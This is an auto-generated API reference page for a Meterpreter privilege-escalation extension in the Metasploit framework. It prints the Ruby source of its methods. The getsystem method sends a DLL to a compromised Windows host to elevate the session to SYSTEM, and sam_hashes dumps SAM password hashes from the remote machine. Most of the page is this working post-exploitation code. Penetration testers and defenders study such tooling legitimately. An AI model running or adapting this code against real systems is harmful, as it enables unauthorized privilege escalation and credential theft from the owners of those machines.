Class/Module Index [+]

Quicksearch

Rex::Post::Meterpreter::Extensions::Priv::Priv

This meterpreter extensions a privilege escalation interface that is capable of doing things like dumping password hashes and performing local exploitation.

Attributes

fs[R]

Modifying privileged file system attributes.

Public Class Methods

new(client) click to toggle source

Initializes the privilege escalationextension.

# File lib/rex/post/meterpreter/extensions/priv/priv.rb, line 24
def initialize(client)
        super(client, 'priv')

        client.register_extension_aliases(
                [
                        {
                                'name' => 'priv',
                                'ext'  => self
                        },
                ])

        # Initialize sub-classes
        self.fs = Fs.new(client)
end

Public Instance Methods

getsystem( technique=0 ) click to toggle source

Attempt to elevate the meterpreter to Local SYSTEM

# File lib/rex/post/meterpreter/extensions/priv/priv.rb, line 42
def getsystem( technique=0 )
        request = Packet.create_request( 'priv_elevate_getsystem' )

        elevator_name = Rex::Text.rand_text_alpha_lower( 6 )

        if( client.platform == 'x64/win64' )
                elevator_path = ::File.join( Msf::Config.install_root, "data", "meterpreter", "elevator.x64.dll" )
        else
                elevator_path = ::File.join( Msf::Config.install_root, "data", "meterpreter", "elevator.dll" )
        end

        elevator_path = ::File.expand_path( elevator_path )

        elevator_data = ""

        ::File.open( elevator_path, "rb" ) { |f|
                elevator_data += f.read( f.stat.size )
        }

        request.add_tlv( TLV_TYPE_ELEVATE_TECHNIQUE, technique )
        request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_NAME, elevator_name )
        request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_DLL, elevator_data )
        request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_LENGTH, elevator_data.length )

        # as some service routines can be slow we bump up the timeout to 90 seconds
        response = client.send_request( request, 90 )

        technique = response.get_tlv_value( TLV_TYPE_ELEVATE_TECHNIQUE )

        if( response.result == 0 and technique != nil )
                client.core.use( "stdapi" ) if not client.ext.aliases.include?( "stdapi" )
                client.sys.config.getprivs
                if client.framework.db and client.framework.db.active
                        client.framework.db.report_note(
                                :host => client.sock.peerhost,
                                :workspace => client.framework.db.workspace,
                                :type => "meterpreter.getsystem",
                                :data => {:technique => technique}
                        ) rescue nil
                end
                return [ true, technique ]
        end

        return [ false, 0 ]
end
sam_hashes() click to toggle source

Returns an array of SAM hashes from the remote machine.

# File lib/rex/post/meterpreter/extensions/priv/priv.rb, line 91
def sam_hashes
        # This can take a long long time for large domain controls, bump the timeout to one hour
        response = client.send_request(Packet.create_request('priv_passwd_get_sam_hashes'), 3600)

        response.get_tlv_value(TLV_TYPE_SAM_HASHES).split(/\n/).map { |hash|
                SamUser.new(hash)
        }
end

[Validate]

Generated with the Darkfish Rdoc Generator 2.